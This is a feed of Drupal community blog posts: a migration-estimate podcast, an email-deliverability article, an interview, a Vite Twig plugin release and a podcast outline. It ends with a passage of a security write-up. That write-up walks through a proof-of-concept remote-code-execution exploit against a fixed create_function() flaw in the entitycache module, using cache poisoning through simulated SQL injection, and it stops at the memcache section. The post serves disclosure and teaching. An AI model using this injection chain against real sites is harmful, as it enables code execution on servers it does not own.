Join #coding-standards in Drupal Slack to meet and work with others on improving the Drupal coding standards. We work on improving our standards as well as implementing them in the core software.

Nov 28 2023
Nov 28

Part 1 | Part 2 |Part 3

Hosted by Michael Meyers, - Managing Director of Tag1 Consulting, and Janez Urevc, Sr. Engineer at Tag 1. This podcast series focuses on the strategies involved in upgrading and migrating Drupal websites and applications.

[embedded content]

In this episode, the hosts are again joined by Drupal Expert Lucas Hedding, and they dive into the complex world of estimating Drupal migrations. The discussion aims to answer the often-asked question: "How much will my platform migration cost?" The team outlines that there's no one-size-fits-all answer, and the process involves a variety of methodologies. Some methods can produce quick but potentially less accurate estimates, while others are more labor-intensive but yield more reliable results.

The conversation also covers how we at Tag1 approach our estimating process, employing a blend of bottom-up, three-point, and parametric methodologies. These detailed estimation techniques often increase client confidence and successful project partnerships.

Listen in to learn more!

Part 1 | Part 2 | Part 3

Please let us know if you have specific migration-related topics you'd like to see us cover. Or, reach out and let us know if we can be an active part of ensuring your migration is a success!

For a transcript of this video, see A Guide to Estimating Migrations - How Much Will My Drupal Migration Cost? Part 2/3.

Nov 28 2023
Nov 28

Introduction

Email marketing is celebrated for its exceptional return on investment, with a study by Litmus claiming an ROI of $36 for every $1 spent. But when emails fail to reach inboxes, this ROI is bound to decrease drastically. This is why ensuring deliverability is important for any successful email marketing campaign.

Unfortunately, email marketing delivery is getting complicated. A recent study shows that over 20% of marketing emails never reach the recipient's inbox. Evolving subscriber preferences and new technology trends add to this complexity.

Salesforce Marketing Cloud Engagement provides an easy-to-use solution for these challenges across industries. It helps users set up marketing campaigns and ensure effective monitoring at every stage.

What Is Deliverability?

Email deliverability refers to the ability of an email to reach the recipient's inbox without being filtered or marked as spam. It is a crucial metric in email marketing, ensuring that messages are successfully delivered to the intended audience. Several factors influence deliverability, including sender reputation, content quality, and adherence to industry best practices.

High deliverability rates are essential for the success of email campaigns, as emails that end up in spam folders or are blocked can result in missed opportunities and decreased engagement. To optimize deliverability, marketers employ various strategies such as:

  • Maintaining a clean and engaged subscriber list
  • Crafting relevant and valuable content
  • Monitoring and improving sender reputation through proper authentication and feedback

Deliverability Features In Salesforce Marketing Cloud

The Salesforce Marketing Cloud Engagement makes it easier for users to set up and monitor email deliverability across campaigns to ensure that emails get to the subscriber’s inbox. It also provides other benefits like:

  • Scalability

The Marketing Cloud platform provides shared and private IP delivery, allowing users to deliver at high rates, usually above 2 million emails per day, while maintaining a good sender reputation.

  • Reduce Complexity

SFMCE is a single platform that organizations can use to run marketing campaigns at scale. Even if third-party tools are required, the AppExchange platform allows users to integrate the necessary tools within the Marketing Cloud workflow and ensure compliance.

All data processed within the Salesforce Marketing Cloud is done while following the latest security and privacy regulations.

SFMCE also comes with features suited to fulfill various deliverability needs like:

Deliverability Need

Description

Feature

Set-Up

Set up an email delivery configuration (IPs, Domains, Domain-Based Message Authentication, Reporting, and Conformance, (DMARC) and DomainKeys Identified Mail (DKIM)) while maintaining high sender reputation and deliverability

Sender Authentication Package: Allows users to customize links and images to match branding for the sender’s authenticated domain

Delivery Monitoring

Monitor and troubleshoot email deliverability

Deliverability Tools & Reports: Helps proactively monitor deliverability, engagement rates, bounce reasons, and domain issues

Reputation Monitoring

Monitor and troubleshoot reputation across IPs and Internet Service Providers

Sender Rating Score: Grades the reputation of outgoing mail servers on a scale of 0 to 100. The higher the score, the more trustworthy the sender

List Hygiene Monitoring

Filter undeliverable, reputation-damaging, or low-quality subscribers

List Detective: Removes problematic email addresses and domains

Apart from these standard features, users can leverage advanced deliverability tools through AppExchange.

Deliverability Tools

Tips To Improve Email Deliverability With Salesforce Marketing Cloud

There are several tips that users can employ to improve the deliverability of emails sent through Salesforce Marketing Cloud.

Ensure Compliance

Countries have rolled out laws to control the quality of transactional and commercial emails, like the Controlling the Assault of Non-Solicited Pornography and Marketing Act of 2003 (CAN-SPAM). According to this legislation, commercial emails must feature a functional internet-based opt-out option active for at least 30 days post-sending.

Organizations’ physical mailing addresses should also be visible in the email body. Marketers cannot use false or misleading names, harvest email addresses off the internet, and use open relays to send emails.

Salesforce Marketing Cloud automatically checks for these requirements to ensure that you remain compliant. This ensures a high sender reputation and deliverability.

Email Authentication & IP Warming

Impersonation by spammers is a common threat. To combat this, authenticate your email using standards like DomainKeys Identified Mail (DKIM) and Sender Policy Framework (SPF) to safeguard your brand.

SFMC provides a Sender Authentication Package for managing email authentication, making your emails come across as legitimate. Users can also perform IP warming while migrating to or from Salesforce Marketing Cloud. This involves gradually increasing the volume of your regular emails over a few weeks to prevent ISPs from flagging your new IP address as spam.

Address Book Strategy

Incorporate address book instructions directly into your emails to increase the likelihood of subscribers adding you and reducing the chances of ending up in spam folders. The Add to Address Book tool simplifies this process by offering a hyperlink with instructions for major email providers.

By including this link in your emails, subscribers can easily access instructions on adding your sending address to their address book, ensuring the successful delivery of your future emails.

Ensure Permission

Ensure all the contacts in your subscriber lists have given you permission to email them. High complaint rates are possible if you don't have explicit permission, which can lead to low deliverability and reputation.

Remove Bounced Addresses

If your bounce rate is over 20%, proactively remove your bounced addresses before your next send. A bounce rate of over 20% can dramatically damage your deliverability and ISP reputation. 

Subject Line Engagement & Recognition

Craft a subject line that depicts the clear intentions of your email. Make sure that your subscribers are also able to recognize your email from the subject line as well.

Organizations can do this by using subject lines that generate curiosity and contain the organization's name for easy recognition. The Content Detective tool in Email Studio will also help identify spam triggers in your email content.

From Name & Address

Ensure that the 'from name' and 'from email address' are easily identifiable for your subscribers. Some organizations may display only the 'from address,' emphasizing the importance of having a recognizable name instead of a number or cryptic address.

Manage Frequency & Content

Effectively managing email content and frequency is crucial for engaging subscribers. Begin by understanding your audience, segmenting based on preferences, and tailoring content accordingly.

Create a content calendar to plan, ensuring consistency and relevance. Implement personalization, monitor engagement metrics, and regularly optimize content based on feedback. Comply with regulations, conduct A/B testing, and stay adaptable to changing trends.

Segmentation For Personalization

Segment your audience based on their interests, behaviors, and engagement levels. Salesforce Marketing Cloud's segmentation capabilities allow organizations to create highly targeted email lists.

Dynamic Content Personalization

Salesforce Marketing Cloud allows you to dynamically adjust email content based on recipient preferences, behaviors, or demographics. For example, a retailer can use dynamic content to showcase details about women's apparel in the content section for female subscribers and details about men's clothing for male subscribers.

Launch Successful Email Marketing Campaigns With SFMCE

Salesforce Marketing Cloud Engagement makes sure that your emails reach the right audience. It helps create a tangible impact with higher open rates, improved customer engagement, and a stronger brand presence.

With SFMCE, users are not just optimizing for algorithms but also boosting their brand's reliability in their recipients' inboxes. It helps launch successful email marketing campaigns to foster consistent, meaningful communication and connections.

Schedule a call with our experts to learn more about enhancing email campaign deliverability with Salesforce Marketing Cloud Engagement

Nov 28 2023
Nov 28

Agiledrop is highlighting active Drupal community members and interesting projects through a series of interviews. This time we had a great conversation with Chapter Three’s managing partner John Faber about Next-Drupal, the need to change Drupal’s messaging in order to attract more people to the project, and what the future holds for Drupal. We hope you enjoy reading!

1. Please tell us a little about yourself and Chapter Three. How do you participate in the Drupal community and what do you do professionally?

My name is John Faber, and I'm the managing partner of Chapter Three. I've been in the internet business in San Francisco since about 1991 when I started an internet service provider. This was pre-everything. We sold bandwidth in San Francisco during the cowboy days of the internet, which was just so fun and it really was part of why I am still in internet because there was a lot of freedom in what we were doing. 

I sold that in 2000 and we had an economic turndown in 2000 as well, a pretty bad one here in the Bay Area where the whole internet kind of collapsed. And I had sold the company and so I wasn't doing internet stuff in terms of access, but I was looking for other stuff to do. And that is how I came across Drupal.

It was something like Drupal 3.9, really early in the days of Drupal. My drupal.org user ID is 5402. So I have a four-digit D.O account number, going back to how far back I started with all of this. And with Drupal, there was the business opportunity here for me to do website management, and I didn’t have to do all of the website work. It was really the beginning of database-driven websites. 

So I started a little business doing that; I really learned a lot about Drupal but wanted more. And so I ultimately ended up getting a job with a company called af83, out of France, and helping them here in the Bay Area establish themselves a little bit within the Drupal community. a883 then became Commerce Guys. So, I ended up working with Commerce Guys for a little while. And they had a larger vision for Commerce Guys that they were working on.

And I was here in the Bay Area doing that work for them. And then they launched Platform.sh. But in that time, I ended up getting a job at Chapter Three because the owners of Chapter Three were moving to Pantheon and they needed new people to operate the company.

That's where Stephanie and I came in. About 13 years ago we started running Chapter Three together in the same fashion that it always had been run, which was sort of as a well-known boutique Drupal strategy, design, development, training organization. And we have been doing that now side by side for 13 years.

And I guess some of the special sauce in what I do professionally – I am the top of the company with Stephanie, but one of the things that we do as managers is we work side by side with our employees on projects. We're in the trenches with our employees every single day. And that's a little bit different than some other top level management people. We find that doing that shows our employees that we are in it with them.

And the average employee tenure at Chapter Three is about 8,5 years. So we're doing something right at the company. But that's primarily about myself. I live in Lafayette, California, I have an 18 year old son who's in college, and we're still cranking away at Chapter Three every single day.

2. Of course we need to talk about Next-Drupal, the Next.js/Drupal integration by Chapter Three. Can you tell us more about how that came to be and how it’s progressing?

Next-Drupal was started as a side project during COVID, because our team had wanted to get into React and React-based headless websites and we had built some sites using Gatsby. And we didn't have a great experience with Gatsby because there was no real-time editing and even there were some bugs in it.

And so I told my team, I'm not doing decoupled, I'm not doing React sites unless you can solve this problem for me, which is, I'd like to replace the Twig templating system with a decoupled system of some sort. And what that means is I have to have all the editorial functions that editors have inside Drupal Twig in my decoupled setup.

And I thought that was a tall order, that there's no way they're going to be able to build that. Lo and behold, they built it, and it works. It might not be 100%, but it works pretty darn good. And what I mean by “it works” is it does replace the Twig templating system to some degree. You can do a lot of content editing on a decoupled website using Drupal.

So Chapter Three saw the potential there and decided to fund it, several hundred thousand dollars worth of work. And then we released it to the community to see if we can energize Drupal a little bit.

So we released it, and I talked to Dries about it and showed it to everybody – and it got some buzz, people were into it. And the project is really cranking along now. It gets downloaded 3,100 times a week out of GitHub. There's a ton of people using it. 

When I was in DrupalCon Europe, Next.js and Next-Drupal is where I saw true innovation coming out of the community. But I'm a little biased because that's sort of what I was looking for.

The project's progressing well. The goal now is to have more community contributions. I don't want it just to be Chapter Three building this thing, I want other people to come in and contribute their ideas and their code to this project so that we can make it more of a community effort. 

And I have this weird vision – when we look at inflection points inside Drupal, so, times when something really, really cool came out, and you just go, wow, that's going to change Drupal. There are not many. I sort of go back to Views; when Earl Miles first came out with Views, people were blown away by its potential, it was a game changer and nobody else had it. It was a visual MySQL query builder for content.

People were blown away, and it really changed Drupal, it energized people to do everything with Views. I sort of see Next-Drupal as the same thing. Let's make it like Views. Let's get it into Core. Let's make it part of Drupal. I don't want it just to be a Chapter Three project. 

I want it to be Drupal because we can then compete in the future of this digital world that we're in. So that's my vision, but I don't want to do that alone. I want the community to help me push that and help that be a community effort. So that's where we're at now.

I will say, the lead engineer who was on it now works at Vercel. And so we have a lot of Vercel viewage on this which is great. But what we need and what I'm pushing for right now is community involvement. 

I know there's Next. js people out there using it. And I know there's shops out there using it. Let's all work together to make it the best project inside Drupal, to energize people to come back to the Drupal community and go, yes, this is cool.

3. So, how can we do this? How can we encourage more people to get involved with Drupal and/or contribute to Drupal?

It's a tall order. I think the messaging from the top needs to improve in order to get people to come back to our community. I think there are things in our community that are exciting. But I feel like the messaging needs to change. And that is what I would do to encourage people to come back to the community. 

I would talk about some of the cool, sexy stuff that's going on inside Drupal and talk about what Drupal really is, which is an OG content architecture platform that we can use in a hybrid decoupled or a fully decoupled setup. 

It appears to me that this would be a good direction to bring people back into our community, because I just don't think that PHP and MySQL are really that attractive and you can't really make a compelling story around PHP for young people.

And so we need something else. I'm not seeing that right now. What I do see is communication about things like Project Browser, Automatic Updates, high-end visual layout builders as being the things that will bring people back to our community, and I respectfully disagree with that.

I do think those things are important and should get done. We've been talking about them for years. But I think that we need to figure out a way to energize the message around what Drupal truly is. And that message comes from the top, and that's how you encourage people to come back in.

And the Drupal Association is doing that now. They were at Web Summit. They're going to go to FOSS. They’ve got a new CEO, Tim Doyle, whose job is to change the messaging of Drupal and that's what needs to happen. 

And it needs to be supported from the top down of our community, and we have to have some laser focus on what we are doing as a community and what Drupal is doing as a software package in order to bring people back. And I would say they should focus on JSON:API, GraphQL and all of the sexy stuff that's out there. We're already doing it, but we're not really doing it.

4. How do you see the current state of innovation in Drupal?

There are cool things going on within Drupal, Drupal Core is constantly moving and improving. I love every bit of what they're doing. Unfortunately, the CMO and the decision maker and the marketer don’t understand that type of stuff.

And so I think the state of innovation inside Drupal could use a little kick in the butt. I do think there are things going on, but they're all focused on Twig and PHP and MySQL. And how much longer do we have with PHP, Twig and MySQL, especially in terms of talent?

As I said, when I was in DrupalCon Europe, the space where I saw innovation was inside Next.js. I saw someone starting his own company with a SaaS based version of Drupal running on Next.js. I saw another company create a killer installation profile with an automatic setup.

I saw another shop invest money in the Decoupled Search API. But I just didn't see much really cool stuff just happening in regular old Drupal, except for the cool stuff that's happening in Core, which I would definitely not deprecate. It's very cool. I love it, but why can't we improve the JSON:API output with a filter? People would love it a lot better. 

What's happening now is, people go out, they're like, Drupal is hard, so they leave, then they're like, we want to go decoupled, that might be really cool in Drupal. And then they use it as a decoupled platform and it's really hard. We need to solve the “really hard” somewhere. And I think it's pretty easy to clean up the JSON:API – but I am biased.

5. So, what do you think the future holds for Drupal? 

I think the future for Drupal holds specialization. I think that's where it's going. It's not a general product. It's a specialized product that lives inside very specific verticals like government, education, nonprofit, healthcare.

And I feel as though specialization is the differentiator that's going to be in the future for us when we know we need to get off the islands. We've been on the Drupal Island now for 20 years. We need to expand out. I think the Drupal Association agrees with that and has plans for that.

6. Besides Next-Drupal, are there any other contributions from Chapter Three that you are really proud of and would like to highlight?

Well, I love our Next.js contribution. I also love the work that we did in Drupal 8. We really inspired other companies to hire core maintainers. We hired Alex Pott for almost two years to help us get Drupal 8 over the finish line.

And we sort of set a model of paying someone a full salary and let them just work on Core and things get done. So I'm super proud of that because I feel like there are other companies now that are modeling that behavior. I know that Catch is employed, for example, and so I know that there are other people doing it, they see the benefit of that.

We also support 90 projects and have about 7,700 commits on Drupal Core right now. So that's quite large. I'm super proud of all of that work that we've given back. 

And then another one that I'm super proud of is our Apigee Developer Portal project, which is sort of under the covers. A lot of people haven't heard about it, but the Apigee Dev Portal is very cool and it's exposing Drupal to the really big stakeholders in their tech departments and they're seeing the value of it. 

I'm just generally super proud of Chapter Three, the way that our company operates and the fact that our company has been around for almost 17 years and really holds the same ethos and values as when it first started, which is: we're a cool company. We like doing cool stuff. We respect our employees. And I'm super proud of the fact that we've been able to keep that alive for so long.

Nov 27 2023
Nov 27

We're proud to announce the release of vite-plugin-twig-drupal, a plugin for Vite that we hope will improve your workflow for front-end development with Drupal.

The problem space

You're working with Twig in a styleguide-driven-development process. You're writing isolated components that consist of CSS, Twig and JavaScript. You want to be able to use Twig to render your components for Storybook. You want fast refresh with Vite. You want Twig embeds, includes and extends to work. You want to use Drupal-specific twig features like create_attributes etc. You want compilation of PostCSS and SASS to CSS. You want Hot Module Reloading (HMR) so that you can see how your components look without needing to endlessly refresh.

Enter vite-plugin-twig-drupal

The Vite plugin Twig Drupal is a Vite plugin based on Twig JS for compiling Twig-based components into a JavaScript function so that they can be used as components with Storybook. It allows you to import Twig files into your story as though they are JavaScript files.

Comparison to other solutions

  • Vite plugin twig loader doesn't handle nested includes/embeds/extends. These are a fairly crucial feature of Twig when building a component library as they allow re-use and DRY principles
  • Components library server requires you to have a running Drupal site. Whilst this ensures your Twig output is identical to that of Drupal (because Drupal is doing the rendering), it is a bit more involved to setup. If you're going to use single directory components or a similar Drupal module like UI patterns then this may be a better option for you.

Installation

This module is distributed via npm, which is bundled with node and should be installed as one of your project's devDependencies:

npm install --save-dev vite-plugin-twig-drupal

You then need to configure your vite.config.js.

import { defineConfig } from "vite"
import twig from 'vite-plugin-twig-drupal';
import { join } from "node:path"
export default defineConfig({
  plugins: [
    // Other vite plugins.
    twig({
      namespaces: {
        components: join(__dirname, "/path/to/your/components"),
        // Other namespaces as required.
      },
      // Optional if you are using React storybook renderer. The default is 'html' and works with storybook's html
      // renderer.
      // framework: 'react' 
    }),
    // Other vite plugins.
  ],
})

With this config in place, you should be able to import Twig files into your story files.

Examples

To make use of a Twig file as a Storybook component, just import it. The result is a component you can pass to Storybook or use as a function for more complex stories.

// stories/Button.stories.js
// Button will be a Javascript function that accepts variables for the twig template.
import Button from './button.twig';
// Import stylesheets, this could be a sass or postcss file too.
import './path/to/button.css';
// You may also have JavaScript for the component.
import './path/to/some/javascript/button.js';
export default {
  title: 'Components/Button',
  tags: ['autodocs'],
  argTypes: {
    title: {
      control: { type: 'text' },
    },
    modifier: {
      control: { type: 'select' },
      options: ['primary', 'secondary', 'tertiary'],
    },
  },
  // Just pass along the imported variable.
  component: Button,
};
// Set default variables in the story.
export const Default = {
  args: { title: 'Click me' },
};
export const Primary = {
  args: { title: 'Click me', modifier: 'primary' },
};
// Advanced example.
export const ButtonStrip = {
  name: 'Button group',
  render: () => `
    ${Button({title: 'Button 1', modifier: 'primary'})} 
    ${Button({title: 'Button 2', modifier: 'secondary'})}
  `
}

Here's how that might look in Storybook (example from the Admin UI Initiative storybook)

Screenshot of a button in storybook

Dealing with Drupal.behaviors

In cases where the JavaScript you import into your story file uses a Drupal behavior, you'll likely need some additional code in your Storybook configuration to handle firing the behaviors. Here at PreviousNext, we prefer to use a loadOnReady wrapper, which works with and without Drupal. However, if you're just using Drupal.behaviors something like this in your Storybook config in main.js (or main.ts) will handle firing the behaviors.

const config = {
  // ... existing config
  previewBody: (body) => `
    
  ${body}
  `
  // ... more config
}

Give it a try

We're looking forward to using this plugin in client projects and are excited about the other possibilities Storybook provides us with, such as interaction and accessibility testing.

Thanks to early testers in the community, such as Ivan Berdinsky and Sean Blommaert, who've already submitted some issues to the github queue. We're really happy to see it in use in the Admin Initiative's work on a new toolbar.

Give it a try, and let us know what you think.

Nov 27 2023
Nov 27

Today we are talking about The Needs Review Queue Initiative, What it is, and How it’s helping to improve Drupal with guest Stephen Mustgrave. We’ll also cover Translation Management Tool as our module of the week.

For show notes visit:
www.talkingDrupal.com/426

Topics

  • Can you give an overview of Needs Review Issue Queue Initiative
  • Is the bug smash initiative related to the needs review issue queue
  • Is this the same as the needs review bot
  • How many issues were in the Needs Review status when you started
  • How many issues today
  • How long did it take until it was manageable
  • How long do items stay on average
  • Who else is helping
  • Let’s talk through the pagination heading level issue
  • What help can the community provide
  • How does someone get involved
  • Do you think this helps with burnout for core committers
  • What’s the future of the initiative

Resources

Guests

Stephen Mustgrave - smustgrave

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Translation Management Tool (TMGMT)

  • Brief description:
    • Have you ever wanted to automate the process of creating content translations on your Drupal site? There’s a module for that.
  • Brief history
    • How old: created in Jan 2012
    • Versions available: 7.x-1.0-rc3 and 8.x-1.15, the latter of which works with Drupal 9 and 10
  • Maintainership
    • Actively maintained
    • Test coverage
    • Documentation
    • Number of open issues: 595, 139 of which are bugs against the 8.x branch
  • Usage stats:
    • 8,766 sites
  • Maintainer(s):
    • Berdir, a very prolific maintainer in his own right, who also supports well known projects like Search API, Token, Paragraphs, and many more
  • Module features and usage
    • Provides a tool set for automating the process of creating translations for your site content, as well as strings used within the site like menus, interface text, and so on
    • Also has a plugin system to determine what text needs to be translated, so it can be easily adapted to very custom needs
    • With the module installed that Translate tab on your nodes changes to have buttons to request a translation in each language
    • Once a translation has been requested, it will run through states like unprocessed, active, and finished
    • Also provides an option for Continuous Translation, where new and updated content is automatically submitted for translation
    • Allows for professional translation at scale, using whatever kind of service works best for your site
    • The need for robust translation capabilities is what originally got me started using Drupal, so it’s great to see that there are enterprise-grade options for sites that need to manage translations at scale
Nov 27 2023
Nov 27

PHP's create_function() was:

DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0

As the docs say, its use is highly discouraged.

PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular linux distributions provide support for years beyond the upstream End of Life).

Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.

The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.

The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.

This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.

To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.

Is it unsafe input?

Interestingly, the issue is in a drush specific inc file:

/**
 * Implements hook_drush_cache_clear().
 */
function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (isset($info['entity cache']) && $info['entity cache']) {
      // You can't pass paramters to the callbacks in $types, so create an
      // anonymous function for each specific bin.
      $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");
      $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba;
    }
  }
}

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...

Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.

So - as is often the case - it's very risky to pass unsafe user input to it.

In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().

Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?

entity_cache_info() uses a cache to minimise calls to implementations of hook_entity_info.

If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.

Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.

How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:

Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.

So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.

We'll also look at how an attacker might use memcache as an attack vector.

Proof of Concept

To keep things simple initially, we'll look at conducting the attack via SQL.

Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.

As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.

Objectives

  • The malicious payload has to be injected into the array keys of the cached data returned by entity_cache_info().
  • The injection cannot break Drupal so badly that drush cannot run a cache clear.
  • However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).

The relevant cache item here is:

$cache = cache_get("entity_info:$langcode")

https://git.drupalcode.org/project/drupal/-/blob/7.98/includes/common.in...

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:

array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_cache_info() will return.

The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.

We can use drush to run some simple code that stores our array into the cache:

$ drush php
 
>>> $entity_info = array('malicious payload' => 'foo');
=> [
     "malicious payload" => "foo",
   ]
 
>>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:

$ drush sqlc
 
> SELECT * FROM cache WHERE cid = 'entity_info:en';
+----------------+-------------------------------------------+--------+------------+------------+
| cid            | data                                      | expire | created    | serialized |
+----------------+-------------------------------------------+--------+------------+------------+
| entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} |      0 | 1696593295 |          1 |
+----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)

How is the site doing now? Let's try a drush status:

$ drush st
 
Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).
 
Drush was not able to start (bootstrap) Drupal.  
Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when try to clear caches by running drush cc all.

We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.

The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.

It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.

We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb on a vanilla D7 install) and is therefore quite cumbersome to manipulate.

Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.

It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.

Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:

$entity_info['user'] = [                                                           
  'controller class' => 'EntityCacheUserController',                               
  'base table' => 'users',                                                         
  'entity keys' => ['id' => 'uid'],                                                
  'schema_fields_sql' => ['base table' => ['uid']],                                
  'entity cache' => TRUE,                                                          
];                                                                                 
 
$entity_info = [                                                                   
  'user' => $entity_info['user'],                                                  
  'file' => $entity_info['user'],                                                  
  'malicious payload' => $entity_info['user']
];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.

Let's try injecting that into the cache via drush php and then checking whether drush is still functional.

It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.

$ cat cache_injection.php
 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user']
];
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush st
 Drupal version                  :  7.99-dev
 
...snip - no errors...
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => malicious payload
)

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.

$ drush cc all
'all' cache was cleared.
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => comment
    [1] => node
    [2] => file
    [3] => taxonomy_term
    [4] => taxonomy_vocabulary
    [5] => user
)

We're making progress though.

Let's try putting an actual payload into the array key in our script:

$ tail -n7 cache_injection.php 
 
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user']                                      
]; 
 
cache_set('entity_info:en', $entity_info);
 
$ drush scr cache_injection.php
 
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);} echo "code execution successful"; //
)
 
$ drush cc all
code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.

A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.

Having said we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do this, they don't really need to mess around with injecting payloads into the caches.

Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.

Attack via SQLi

If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.

$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'
 
a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.

If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.

To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.

After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.

Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.

I often think fiddly things like this are the hardest part of developing these PoC exploits!

# inject the payload using a drush script
$ drush scr cache_injection.php
 
# extract the payload into a SQL statement stored in a file
$ echo -n "UPDATE cache SET data = '" > sqli.txt
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt
$ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt
 
# empty the cache table, and repopulate it with valid entries
$ drush sqlq 'DELETE FROM cache;'
$ drush st
 
# inject the payload, simulating SQLi
$ cat sqli.txt | drush sqlc
 
# execute the attack
$ drush cc all
code execution successful ...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.

In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.

However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.

Attack via memcache

How about if the caches are in memcache; what might an attack look like then?

